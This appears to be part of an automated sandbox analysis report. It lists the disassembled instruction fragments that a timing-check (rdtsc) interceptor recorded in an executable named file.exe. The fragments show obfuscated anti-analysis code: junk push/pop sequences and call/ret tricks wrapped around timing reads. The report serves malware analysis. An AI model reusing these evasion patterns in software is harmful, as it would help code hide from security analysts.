Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 414B22 second address: 414B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F86A0EA80FFh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 414B3E second address: 414B44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 415081 second address: 4150A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F86A0EA8109h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4150A4 second address: 4150BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A191947Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F86A1919476h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4150BD second address: 4150C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 417EDB second address: 417EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A1919488h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 417EF8 second address: 417F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F86A0EA80F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 417F02 second address: 417F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919486h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sbb si, F183h 0x00000013 push 00000000h 0x00000015 push 3B53E33Ah 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007F86A191947Dh 0x00000021 jnl 00007F86A1919476h 0x00000027 popad 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b pop eax 0x0000002c popad 0x0000002d xor dword ptr [esp], 3B53E3BAh 0x00000034 movsx esi, cx 0x00000037 push 00000003h 0x00000039 mov cx, 8AD3h 0x0000003d push 00000000h 0x0000003f push 00000003h 0x00000041 jbe 00007F86A1919480h 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a mov edx, dword ptr [ebp+122D3B07h] 0x00000050 popad 0x00000051 push AF66B4EEh 0x00000056 push eax 0x00000057 push esi 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 418009 second address: 4180A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F86A0EA8101h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F86A0EA8106h 0x00000012 jmp 00007F86A0EA80FCh 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F86A0EA80F8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov cx, 6443h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F86A0EA80F8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 movzx edi, dx 0x00000056 push A678174Eh 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F86A0EA8101h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4180A7 second address: 41812C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919487h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5987E932h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F86A1919478h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a xor esi, dword ptr [ebp+122D3D34h] 0x00000030 and cx, 39A9h 0x00000035 push 00000003h 0x00000037 mov dword ptr [ebp+122D1D53h], edi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F86A1919478h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 add dl, FFFFFF8Bh 0x0000005c push 00000003h 0x0000005e mov edx, ecx 0x00000060 push F0DADD76h 0x00000065 pushad 0x00000066 js 00007F86A191947Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 41812C second address: 418133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4182B0 second address: 4182F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F86A1919484h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F86A1919487h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F86A191947Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4182F8 second address: 418303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F86A0EA80F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 418303 second address: 41831C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnl 00007F86A1919482h 0x00000011 je 00007F86A191947Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 41831C second address: 418342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 add edx, dword ptr [ebp+122D3C24h] 0x0000000b lea ebx, dword ptr [ebp+1244CDB6h] 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D1CE1h], edx 0x00000018 mov ecx, dword ptr [ebp+122D3D88h] 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 418342 second address: 418348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 418348 second address: 41834E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 41834E second address: 418352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4391C7 second address: 4391CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4391CF second address: 4391D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4391D3 second address: 4391D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4006E7 second address: 400718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a jmp 00007F86A191947Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F86A1919476h 0x00000017 jmp 00007F86A1919485h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437193 second address: 4371A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F86A0EA80FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437733 second address: 437758 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F86A191948Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437758 second address: 43775C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43775C second address: 43776D instructions: 0x00000000 rdtsc 0x00000002 je 00007F86A1919476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43776D second address: 437773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437773 second address: 437777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437777 second address: 43777B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437A80 second address: 437A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 437EC7 second address: 437ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F86A0EA80F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43892B second address: 438950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A191947Bh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F86A1919481h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 438950 second address: 438954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 438954 second address: 43895E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F86A1919476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 438D36 second address: 438D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 439053 second address: 439059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 439059 second address: 43905D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43905D second address: 43906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jno 00007F86A1919476h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43906F second address: 439078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43B3AA second address: 43B3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43B3AE second address: 43B3C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jng 00007F86A0EA80F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D56B second address: 43D57D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F86A1919476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F86A1919476h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D57D second address: 43D588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D588 second address: 43D5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A1919482h 0x00000009 jmp 00007F86A1919487h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D5BA second address: 43D5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A0EA8100h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D5CE second address: 43D5DE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F86A1919476h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D5DE second address: 43D5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43D5E4 second address: 43D5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43EC12 second address: 43EC1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F86A0EA80F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43EC1F second address: 43EC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F86A191947Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F86A1919476h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43EC3E second address: 43EC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43EC42 second address: 43EC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F86A1919476h 0x0000000e jmp 00007F86A191947Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43EC5F second address: 43EC65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44602F second address: 446043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86A191947Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446043 second address: 44604C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44604C second address: 446052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4462F9 second address: 4462FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4462FF second address: 446309 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F86A1919476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446474 second address: 44647A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44647A second address: 44647E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44647E second address: 4464B0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F86A0EA80F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F86A0EA8109h 0x0000000f pop eax 0x00000010 jo 00007F86A0EA811Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F86A0EA80F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4464B0 second address: 4464B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446791 second address: 4467AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F86A0EA80FEh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 446908 second address: 44690E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44906B second address: 449087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F86A0EA8103h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44913E second address: 449166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F86A191947Ch 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44935A second address: 44935E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44935E second address: 449372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A1919480h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44968D second address: 449692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44A067 second address: 44A07D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F86A191947Ch 0x00000010 jno 00007F86A1919476h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44B379 second address: 44B3D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jno 00007F86A0EA8108h 0x0000000e nop 0x0000000f mov di, 8BB1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F86A0EA80F8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f pushad 0x00000030 pushad 0x00000031 cmc 0x00000032 mov dword ptr [ebp+122D31F2h], edx 0x00000038 popad 0x00000039 clc 0x0000003a popad 0x0000003b push 00000000h 0x0000003d mov di, E981h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44BB8D second address: 44BB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D982 second address: 44D986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D986 second address: 44D98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D98C second address: 44D996 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F86A0EA80FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D996 second address: 44D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F86A1919488h 0x0000000c nop 0x0000000d mov esi, dword ptr [ebp+122D2CD6h] 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D2BD8h], ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F86A1919478h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 sub esi, dword ptr [ebp+122D3E20h] 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D9F0 second address: 44D9F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44D9F6 second address: 44DA1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919484h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F86A191947Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44DA1D second address: 44DA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F86A0EA80F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44FA35 second address: 44FA99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnp 00007F86A1919476h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jne 00007F86A1919495h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F86A1919478h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 cld 0x00000033 push 00000000h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007F86A1919478h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44FA99 second address: 44FAB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44FAB0 second address: 44FAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44FAB5 second address: 44FACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA8105h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 452504 second address: 452508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
